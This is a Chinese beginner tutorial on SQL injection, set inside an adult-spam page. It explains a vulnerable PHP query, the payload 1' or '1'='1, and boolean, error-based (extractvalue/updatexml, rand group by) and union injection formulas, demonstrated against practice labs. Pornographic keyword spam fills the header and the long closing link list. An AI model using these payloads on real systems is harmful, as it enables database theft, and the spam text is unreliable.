成人性生交大片免费看视频r_亚洲综合极品香蕉久久网_在线视频免费观看一区_亚洲精品亚洲人成人网在线播放_国产精品毛片av_久久久久国产精品www_亚洲国产一区二区三区在线播_日韩一区二区三区四区区区_亚洲精品国产无套在线观_国产免费www

主頁 > 知識庫 > SQL注入詳解(掃盲篇)

SQL注入詳解(掃盲篇)

熱門標簽:湖南保險智能外呼系統(tǒng)產(chǎn)品介紹 怎么申請400熱線電話 ai電話電話機器人 河北便宜電銷機器人軟件 簡單的智能語音電銷機器人 怎么去開發(fā)一個電銷機器人 南昌呼叫中心外呼系統(tǒng)哪家好 泗洪正規(guī)電話機器人找哪家 小程序智能電話機器人

SQL注入是比較常見的網(wǎng)絡(luò)攻擊方式之一,它不是利用操作系統(tǒng)的BUG來實現(xiàn)攻擊,而是針對程序員編程時的疏忽,通過SQL語句,實現(xiàn)無帳號登錄,甚至篡改數(shù)據(jù)庫。下面這篇文中就SQL注入進行一個深入的介紹,感興趣的朋友們一起來看看吧。

SQL注入攻擊的總體思路

     1.尋找到SQL注入的位置

     2.判斷服務(wù)器類型和后臺數(shù)據(jù)庫類型

     3.針對不通的服務(wù)器和數(shù)據(jù)庫特點進行SQL注入攻擊

關(guān)于 SQL Injection(SQL注入)

SQL Injection 就是通過把惡意的 SQL 命令插入到 Web 表單讓服務(wù)器執(zhí)行,最終達到欺騙服務(wù)器或數(shù)據(jù)庫執(zhí)行惡意的 SQL 命令。

學(xué)習(xí) SQL 注入,首先要搭一個靶機環(huán)境,我使用的是OWASP BWA,感興趣的可以去官網(wǎng)下載一個安裝,除了 SQL 注入,很多靶機環(huán)境都可以在 BWA 中找到,它專門為 OWASP ZAP 滲透工具設(shè)計的。

$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid) or die('pre>' . mysql_error() . '/pre>' );
$num = mysql_numrows($result);

這是一個很簡單的 PHP代碼,從前臺獲得 id 的值,交給數(shù)據(jù)庫來執(zhí)行,把結(jié)果返回給前臺。

比如我們在 OWASP 里輸入 id = 1,點擊 Submit,返回結(jié)果如下:

稍微懂一點后臺或者數(shù)據(jù)庫的人都知道,上面的那段代碼是有嚴重問題的,沒有對 id 的值進行有效性、合法性判斷。也就是說,我們在 submit 輸入框輸入的如何內(nèi)容都會被提交給數(shù)據(jù)庫執(zhí)行,比如在輸入框輸入1' or '1'='1,執(zhí)行就會變成:

//原先要在數(shù)據(jù)庫中執(zhí)行的命令
SELECT first_name, last_name FROM users WHERE user_id = '1'
//變成
SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'='1'

注意一下單引號,這是 SQL 注入中非常重要的一個地方,所以注入代碼的最后要補充一個 '1'='1讓單引號閉合。

由于 or 的執(zhí)行,會把數(shù)據(jù)庫表 users 中的所有內(nèi)容顯示出來,

下面對三種主要的注入類型進行介紹。

Boolean-based 原理分析

首先不得不講SQL中的AND和OR

AND 和 OR 可在 WHERE 子語句中把兩個或多個條件結(jié)合起來。

AND:返回第一個條件和第二個條件都成立的記錄。

OR:返回滿足第一個條件或第二個條件的記錄。

AND和OR即為集合論中的交集和并集。

下面是一個數(shù)據(jù)庫的查詢內(nèi)容。

mysql> select * from students;
+-------+-------+-----+
| id | name | age |
+-------+-------+-----+
| 10056 | Doris | 20 |
| 10058 | Jaune | 22 |
| 10060 | Alisa | 29 |
+-------+-------+-----+
3 rows in set (0.00 sec)

1)

mysql> select * from students where TRUE ;
+-------+-------+-----+
| id | name | age |
+-------+-------+-----+
| 10056 | Doris | 20 |
| 10058 | Jaune | 22 |
| 10060 | Alisa | 29 |
+-------+-------+-----+
3 rows in set (0.00 sec)

2)

mysql> select * from students where FALSE ;
Empty set (0.00 sec)

3)

mysql> SELECT * from students where id = 10056 and TRUE ;
+-------+-------+-----+
| id | name | age |
+-------+-------+-----+
| 10056 | Doris | 20 |
+-------+-------+-----+
1 row in set (0.00 sec)

4)

mysql> select * from students where id = 10056 and FALSE ;
Empty set (0.00 sec)

5)

mysql> selcet * from students where id = 10056 or TRUE ;
+-------+-------+-----+
| id | name | age |
+-------+-------+-----+
| 10056 | Doris | 20 |
| 10058 | Jaune | 22 |
| 10060 | Alisa | 29 |
+-------+-------+-----+
3 rows in set (0.00 sec)

6)

mysql> select * from students where id = 10056 or FALSE ;
+-------+-------+-----+
| id | name | age |
+-------+-------+-----+
| 10056 | Doris | 20 |
+-------+-------+-----+
1 row in set (0.00 sec)

會發(fā)現(xiàn)and 1=1 , and 1=2 即是 and TRUE , and FALSE 的變種。

這便是最基礎(chǔ)的boolean注入,以此為基礎(chǔ)你可以自由組合語句。

字典爆破流

and exists(select * from ?) //?為猜測的表名
and exists(select ? from x) //?為猜測的列名

截取二分流

and (length((select schema_name from information_schema.schemata limit 1))>?) //判斷數(shù)據(jù)庫名的長度
and (substr((select schema_name from information_schema.schemata limit 1),1,1)>'?')
and (substr((select schema_name from information_schema.schemata limit 1),1,1)'?') //利用二分法判斷第一個字符

Boolean-based總結(jié)

根據(jù)前面的介紹,我們知道,對于基于Boolean-based的注入,必須要有一個可以正常訪問的地址,比如http: //redtiger.labs.overthewire.org/level4.php?id=1 是一個可以正常訪問的記錄,說明id=1的記錄是存在的,下面的都是基于這個進一步猜測。先來判斷一個關(guān)鍵字keyword的長度,在后面構(gòu)造id=1 and (select length(keyword) from table)=1,從服務(wù)器我們會得到一個返回值,如果和先前的返回值不一樣,說明and后面的(select length(keyword) from table)=1返回false,keyword的長度不等于1。繼續(xù)構(gòu)造直到id=1 and (select length(keyword) from table)=15返回true,說明keyword的長度為15。

為什么我們剛開始一定要找一個已經(jīng)存在的id,其實這主要是為了構(gòu)造一個為真的情況。Boolean-based就是利用查詢結(jié)果為真和為假時的不同響應(yīng),通過不斷猜測來找到自己想要的東西。

對于keyword的值,mysql數(shù)據(jù)庫可以使用substr(string, start, length)函數(shù),截取string從第start位開始的length個字符串id=1 and (select substr(keyword,1,1) from table) ='A',依此類推,就可以獲得keyword的在數(shù)據(jù)庫中的值。

Boolean-based的效率很低,需要多個請求才能確定一個值,盡管這種代價可以通過腳本來完成,在有選擇的情況下,我們會優(yōu)先選擇其他方式。

Error Based 原理分析

關(guān)于錯誤回顯

基于錯誤回顯的sql注入就是通過sql語句的矛盾性來使數(shù)據(jù)被回顯到頁面上。

所用到的函數(shù)

count() 統(tǒng)計元祖的個數(shù)(相當(dāng)于求和)

select count(*) from information_schema.tables; 

rand()用于產(chǎn)生一個0~1的隨機數(shù) 

floor()向下取整 

group by 依據(jù)我們想要的規(guī)矩對結(jié)果進行分組 

concat將符合條件的同一列中的不同行數(shù)據(jù)拼接,以逗號隔開

用于錯誤回顯的sql語句

第一種: 基于 rand() group by 的錯誤

利用group by part of rand() returns duplicate key error這個bug,關(guān)于rand()函數(shù)與group by 在mysql中的錯誤報告如下:

RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.
You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times.

這個bug會爆出duplicate key這個錯誤,然后順便就把數(shù)據(jù)偷到了。

公式:username=admin' and (select 1 from (select count(), concat(floor(rand(0)2),0x23,(你想獲取的數(shù)據(jù)的sql語句))x from information_schema.tables group by x )a) and ‘1' = ‘1

第二種: XPATH爆信息

這里主要用到的是ExtractValue()UpdateXML()這2個函數(shù),由于mysql 5.1以后提供了內(nèi)置的XML文件解析和函數(shù),所以這種注入只能用于5.1版本以后使用

查看sql手冊

語法:EXTRACTVALUE (XML_document, XPath_string);

第一個參數(shù):XML_document是String格式,為XML文檔對象的名稱,文中為Doc

第二個參數(shù):XPath_string (Xpath格式的字符串) ,如果不了解Xpath語法,可以在網(wǎng)上查找教程。

作用:從目標XML中返回包含所查詢值的字符串

語法:UPDATEXML (XML_document, XPath_string, new_value);

第一個參數(shù):XML_document是String格式,為XML文檔對象的名稱,文中為Doc

第二個參數(shù):XPath_string (Xpath格式的字符串) ,如果不了解Xpath語法,可以在網(wǎng)上查找教程。

第三個參數(shù):new_value,String格式,替換查找到的符合條件的數(shù)據(jù)

作用:改變文檔中符合條件的節(jié)點的值

現(xiàn)在就很清楚了,我們只需要不滿足XPath_string(Xpath格式)就可以了,但是由于這個方法只能爆出32位,所以可以結(jié)合mid來使用

公式1:username=admin' and (extractvalue(1, concat(0x7e,(你想獲取的數(shù)據(jù)的sql語句)))) and ‘1'='1

公式2:username=admin' and (updatexml(1, concat(0x7e,(你想獲取的數(shù)據(jù)的sql語句)),1)) and ‘1'='1

基于錯誤回顯的注入,總結(jié)起來就一句話,通過sql語句的矛盾性來使數(shù)據(jù)被回顯到頁面上,但有時候局限于回顯只能回顯一條,導(dǎo)致基于錯誤的注入偷數(shù)據(jù)的效率并沒有那么高,但相對于布爾注入已經(jīng)提高了一個檔次。

union query injection

要了解union query injection,首先得了解union查詢,union用于合并兩個或更多個select的結(jié)果集。比如說

SELECT username, password FROM account;

結(jié)果是

admin 123456

SELECT id, title FROM article

的結(jié)果是

1 Hello, World

SELECT username, password FROM account
UNION 
SELECT id, title FROM article

的結(jié)果就是

admin 123456

1 Hello, World

比起多重嵌套的boolean注入,union注入相對輕松。因為,union注入可以直接返回信息而不是布爾值。前面的介紹看出把union會把結(jié)果拼拼到一起,所有要讓union前面的查詢返回一個空值,一般采用類似于id=-1的方式。

1)

mysql> select name from students where id = -1 union select schema_name from information_schema.schemata; //數(shù)據(jù)庫名 
+--------------------+
| name  |
+--------------------+
| information_schema |
| mysql  |
| performance_schema |
| rumRaisin  |
| t3st  |
| test  |
+--------------------+
6 rows in set (0.00 sec)

2)

mysql> select name from students where id = -1 union select table_name from information_schema.tables where table_schema='t3st'; //表名
+----------+
| name |
+----------+
| master |
| students |
+----------+
2 rows in set (0.00 sec)

3)

mysql> select name from students where id = -1 union select column_name from information_schema.columns where table_name = 'students' ; //列名
+------+
| name |
+------+
| id |
| name |
| age |
+------+
3 rows in set (0.00 sec)

UNION 操作符用于合并兩個或多個 SELECT 語句的結(jié)果集。請注意,UNION 內(nèi)部的 SELECT 語句必須擁有相同數(shù)量的列。列也必須擁有相似的數(shù)據(jù)類型。同時,每條 SELECT 語句中的列的順序必須相同。

舉個例子,還以最開始的 OWASP 為基礎(chǔ),返回了兩個值分別是 first_name 和 sur_name,可想而知,服務(wù)器在返回數(shù)據(jù)庫的查詢結(jié)果時,就會把結(jié)果中的第一個值和第二個值傳給 first_name 和 sur_name,多了或少了,都會引起報錯。

所以你如果想要使用union查詢來進行注入,你首先要猜測后端查詢語句中查詢了多少列,哪些列可以回顯給用戶。

猜測列數(shù)

-1 union select 1
-1 union select 1,2
-1 union select 1,2,3
//直到頁面正常顯示

比如這條語句

-1 UNION SELECT 1,2,3,4

如果顯示的值為3和4,表示該查詢結(jié)果中有四列,并且第三列和第四列是有用的。則相應(yīng)的構(gòu)造union語句如下

-1 UNION SELECT 1,2,username,password FROM table

小結(jié)一下

SQL 注入大概有5種,還有兩種分別是 Stacked_queries(基于堆棧)和 Time-based blind(時間延遲),堆棧就是多語句查詢,用 ‘;' 把語句隔開,和 union 一樣;時間延遲就是利用 sleep() 函數(shù)讓數(shù)據(jù)庫延遲執(zhí)行,偷數(shù)據(jù)的速度很慢。(還有一個第六種,內(nèi)聯(lián)注入,但和前面涉及的內(nèi)容有所重疊,就不單獨來討論了)

引用說明,自己之前研究 SQL 注入的時候,也是一點一點摸索的,本博客的大部分內(nèi)容是來自于公司內(nèi)網(wǎng)的服務(wù)器中(公司定期考核,看你都干了什么)。當(dāng)時因為是內(nèi)網(wǎng),就沒有做引用,現(xiàn)在想找到這些引用的文章也很困難,見諒。

好了,以上就是這篇文章的全部內(nèi)容了,希望本文的內(nèi)容對大家的學(xué)習(xí)或者工作能帶來一定的幫助,如果有疑問大家可以留言交流。

您可能感興趣的文章:
  • 利用SQL注入漏洞登錄后臺的實現(xiàn)方法
  • PHP中防止SQL注入實現(xiàn)代碼
  • PHP+MySQL 手工注入語句大全 推薦
  • php中防止SQL注入的最佳解決方法
  • 整理比較全的Access SQL注入?yún)⒖?/li>
  • php防止SQL注入詳解及防范
  • 利用SQL注入漏洞拖庫的方法
  • php+mysql注入頁面實現(xiàn)
  • discuz的php防止sql注入函數(shù)
  • PHP中防止SQL注入攻擊和XSS攻擊的兩個簡單方法

標簽:那曲 江蘇 淮安 威海 柳州 荊門 瀘州 景德鎮(zhèn)

巨人網(wǎng)絡(luò)通訊聲明:本文標題《SQL注入詳解(掃盲篇)》,本文關(guān)鍵詞  SQL,注入,詳解,掃盲,篇,SQL,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《SQL注入詳解(掃盲篇)》相關(guān)的同類信息!
  • 本頁收集關(guān)于SQL注入詳解(掃盲篇)的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    成人黄色一级视频| 午夜激情福利网| 护士精品一区二区三区| 黑人欧美xxxx| 国产精品成人久久久久| 51色欧美片视频在线观看| 91网在线看| 美乳美女在线观看香蕉| 欧美综合色免费| 久久精品青草| 91麻豆精品国产91久久久久久| 青青久久av| 成年人网站免费观看| 精品日韩欧美一区| 成人爽a毛片免费啪啪红桃视频| 91看片在线免费观看| 久久久久久久久久久国产| 精品成人av| 免费黄色小视频在线观看| 欧美乱大交做爰xxxⅹ性3| 亚洲色图官网| 内射毛片内射国产夫妻| 欧美日韩一区不卡| 无码人妻丰满熟妇精品区| 欧美一区二区三区精品| 波多野结衣久久高清免费| 狠狠操综合网| 亚洲一区二区自拍偷拍| 亚洲图色一区二区三区| 久久精品国产亚洲AV熟女| 免费国产麻豆传| 国产一区二区精品丝袜| 成人一区二区三区视频| 91视频久久久| 国产精品av久久久久久麻豆网| 五月婷婷中文字幕| 国产激情视频一区| 中文日韩电影网站| 99视频在线观看免费| www.天堂在线| 91高潮大合集爽到抽搐| 日本免费成人网| 久久综合九色综合久久久精品综合| 人人做人人澡人人爽欧美| 免费高清成人在线| 国产在线精品一区在线观看麻豆| av蓝导航精品导航| 亚洲精品综合久久中文字幕| 亚洲天堂久久新| 91免费观看视频在线| 日本dvd播放| 国产精品18久久久久久久久久| 国产亚洲精品福利| 超碰在线一区二区三区| 欧美日韩亚洲不卡| 中国一级特黄录像播放| 中文字幕视频在线免费欧美日韩综合在线看| 欧美成人中文字幕在线| 国产一区二区视频在线观看| 日av在线播放中文不卡| 成人满18在线观看网站免费| 久久中文字幕av一区二区不卡| 欧美日韩网址| 伊人久久大香线蕉综合网站| 亚洲一区二区三区精品视频| 国产偷国产偷亚洲高清人白洁| 欧美天天在线| 午夜精品久久久久久久99樱桃| 亚洲AV无码成人精品区明星换面| 亚洲图区一区| 日韩精品一区二区三区三区免费| 成人影音在线| 久久久久狠狠高潮亚洲精品| 亚洲精华国产精华| av电影资源| 欧美交换配乱吟粗大25p| 国产盗摄一区二区三区| 污视频网址在线观看| 黄色影院在线播放| 国产成人香蕉在线视频fuz| 日韩子在线观看| 国产探花在线精品一区二区| 国产特级黄色录像| 日本一区二区三区免费看| 国产精品影视在线观看| 天天操夜夜欢| 国产卡二和卡三的视频| 另类av一区二区| 国产精品诱惑| 国产有码在线一区二区视频| 在线能看的黄色| 欧美床上激情在线观看| 国产美女高潮一区二区三区| 国产精品久久二区二区| 在线亚洲国产精品网站| 国产aⅴ精品一区二区三区黄| 国产精品日韩无码| 亚洲国产欧美一区二区三区丁香婷| a在线播放不卡| www.操操操| 中文乱码字幕午夜无线观看| 亚洲欧美偷拍一区| 亚洲欧美变态国产另类| 图片小说视频色综合| 欧美有码在线观看视频| 欧美高清性xxxxxxx| 黄色av网站在线观看| 制服丝袜中文字幕在线观看| 亚洲精品日韩综合观看成人91| 国产精品久久久久婷婷二区次| 中文字幕在线第一页| 99久久久无码国产精品| 怡红院红怡院欧美aⅴ怡春院| 亚洲人成网站免费播放| 日韩高清精品免费观看| 四虎影视最新网站入口在线观看| 国产毛片毛片| 水莓100国产免费av在线播放| 自拍偷自拍亚洲精品播放| 国产在线看片免费视频在线观看| 日本18视频网站| 校园激情久久| 九色porny自拍视频在线观看| 水蜜桃av无码| 欧美日韩午夜剧场| 麻豆蜜桃在线观看| 自拍偷拍欧美精品| 国产精品无码天天爽视频| 亚洲国产视频一区二区三区| 手机看片1024久久| 日本一二三区不卡| 国产色视频在线| 激情视频免费网站| 黄色片子免费| 日本成人在线免费视频| 欧美a级片免费看| 一道本在线观看视频| 免费污网站在线观看| 欧美性xxxxxxx| 日本少妇激三级做爰在线| 97精品人妻一区二区三区香蕉| 亚洲欧美在线免费| 蜜桃免费在线视频| 中文字幕亚洲在线观看| 国产高清一区二区三区四区| 国产色婷婷国产综合在线理论片a| 99亚偷拍自图区亚洲| 欧美视频国产视频| 在线观看中文字幕av| 热re99久久精品国99热蜜月| 色欲av永久无码精品无码蜜桃| 国产综合一区二区| 影音先锋国产资源站| 波多野结衣在线观看一区二区| 久久成人资源| 午夜激情在线观看视频| 免费一级全黄少妇性色生活片| 四季久久免费一区二区三区四区| 中文文字幕文字幕高清| 久久久女人电视剧免费播放下载| 精品国产a毛片| 久久精品视频91| 久久久久久久中文字幕| 久久久久亚洲av片无码| 国产成人aa精品一区在线播放| 国产一区成人| 国产不卡人人| 国产精品综合不卡av| 污视频软件在线观看| 国产成人综合精品三级| 少妇丰满尤物大尺度写真| 国产在线观看第一页| 欧美视频成人| 亚洲伊人av| 亚洲第一黄色| 欧美成人高潮一二区在线看| 日韩69视频在线观看| 国产黄大片在线观看| 久草福利在线视频| 国产成人天天5g影院在线观看| 裸体一区二区三区| 国产精品视频在线观看免费| 在线观看免费播放网址成人| 中文字幕精品www乱入免费视频| 亚洲最大中文字幕| 国产福利91精品一区二区三区| 日本一二三区视频| 欧美男人天堂网| 男男gay免费网站| 97国产在线观看| 欧美日韩综合精品| 亚洲熟女综合色一区二区三区| 色一情一区二区三区四区| 91麻豆精品国产无毒不卡在线观看| 国产免费拔擦拔擦8x高清在线人| 亚洲乱码国产乱码精品精98午夜| 蜜乳av综合| 久久精品色妇熟妇丰满人妻| 97香蕉久久| 99热播精品免费| 91精品国产91久久综合| 96av麻豆蜜桃一区二区| 最近中文字幕在线免费观看| 日韩精品视频免费| 国产日产欧美a一级在线| 中文字字幕一区二区三区四区五区| 日韩欧美精品一区二区三区经典| 毛片网站免费观看| 青春草在线观看视频| av观看免费在线| 国产精品久久久久久久久久ktv| 波多野吉衣在线视频| 亚洲综合一二三| 日韩欧美国产一区二区在线播放| 亚洲奶大毛多的老太婆| 黄色激情在线视频| 视频污在线观看| 欧美黑人乱大交| 欧美成人一区二区三区片免费| 久久久久久久久久久9不雅视频| 四虎成人精品永久免费av九九| 久久久久久久尹人综合网亚洲| 久久精品成人欧美大片免费| 国产精品午夜剧场| 日韩午夜激情av| 日本影音先锋电影| 欧美特黄a级高清免费大片a级| 欧美日韩精品综合在线| 精品国产1区二区| av在线首页| 成人在线小视频| 99精品视频精品精品视频| 日韩欧美在线网址| 成人一级视频在线观看| 国产欧美日韩精品综合| bdsmchinese医疗折磨| 五月婷婷丁香网| 成人性生活av| 精品久久久久久久无码| 国产喷水在线观看| 国产情侣在线播放| 国产日韩精品在线看| 高清不卡在线观看av| 国产后入清纯学生妹| 日韩精品一区二区三区在线观看| 欧美成人精品在线视频| 黄色在线免费观看| 狠狠色综合欧美激情| 97av中文字幕| 男男gay无套免费视频欧美| 教室别恋欧美无删减版| 18成人免费观看网站下载| 国产成a人亚洲精v品在线观看| 国产原创av在线| 国产欧美视频一区二区三区| 中文亚洲字幕| 日本最新在线视频| 欧美在线视频导航| 欧美精品v日韩精品v韩国精品v| 国产在线88av| 精品无人区乱码1区2区3区在线| 视频一区免费在线观看| 日韩精品福利视频| 亚洲精品一二三区| 第一中文字幕在线| 久久综合色天天久久综合图片| 久久久人成影片一区二区三区观看| 91久久久在线| 国内精品伊人| 台湾佬中文在线| 深夜爽爽视频| sqte在线播放| 亚洲高清久久| 91制片厂在线| 久久久人成影片一区二区三区| 致1999电视剧免费观看策驰影院| 99亚洲一区二区| 国产麻豆一精品一av一免费| 久久精品一区中文字幕| 亚洲乱码国产乱码精品精| 日皮视频免费观看| 欧美精品一区二区三区蜜桃| 亚洲成在人线在线播放| 精品国产一区二区三区久久狼5月| av午夜精品一区二区三区| 亚洲911精品成人18网站| 免费看成年人视频| 超碰国产精品久久国产精品99| 欧美黄色大片网站| 成人做爰高清视频网站| 亚洲三级在线视频| 国产精品国产三级国产在线观看| avtt综合网| 日韩精品一级中文字幕精品视频免费观看| 国产裸体永久免费无遮挡| 久久精品国产精品青草色艺| 97在线资源在| 四虎影视精品成人| 乱馆动漫1~6集在线观看| 欧美精品成人久久| 日本午夜一区二区三区| 久久久久久久久久久一区| 国产不卡一区二区三区在线观看| 日本道中文字幕| 三级黄在线播放| 日批在线观看视频| 亚洲大片av| 亚洲国产精彩中文乱码av| 日本一道高清亚洲日美韩| 国产99精品一区| 久草热8精品视频在线观看| 超碰97人人做人人爱少妇| 日本在线人成| 日韩高清免费观看| 首页欧美精品中文字幕| jizzjizz日本护士免费| 日韩欧美一级精品久久| 9i精品一二三区| 日产国产高清一区二区三区| 国精产品一区一区三区mba视频| 亚洲精品午夜在线观看| 亚洲毛片一区二区| 精品国产免费av| 99在线高清视频在线播放| 亚洲黄色av片| av老司机免费在线| 男人艹女人在线观看| av在线免费不卡|